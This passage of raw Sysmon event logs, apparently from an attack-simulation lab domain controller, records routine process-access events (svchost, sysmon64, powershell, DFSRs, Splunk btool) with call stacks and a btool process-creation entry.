Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-5200-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-5200-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8552-5FCF-5100-000000009101}25082128C:\Windows\system32\cmd.exe{10ACEC4A-8552-5FCF-5200-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.807{10ACEC4A-8552-5FCF-5200-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8552-5FCF-5100-000000009101}2508C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8551-5FCF-3200-000000009101}24723424C:\Windows\system32\DFSRs.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c2ea|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-5100-000000009101}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 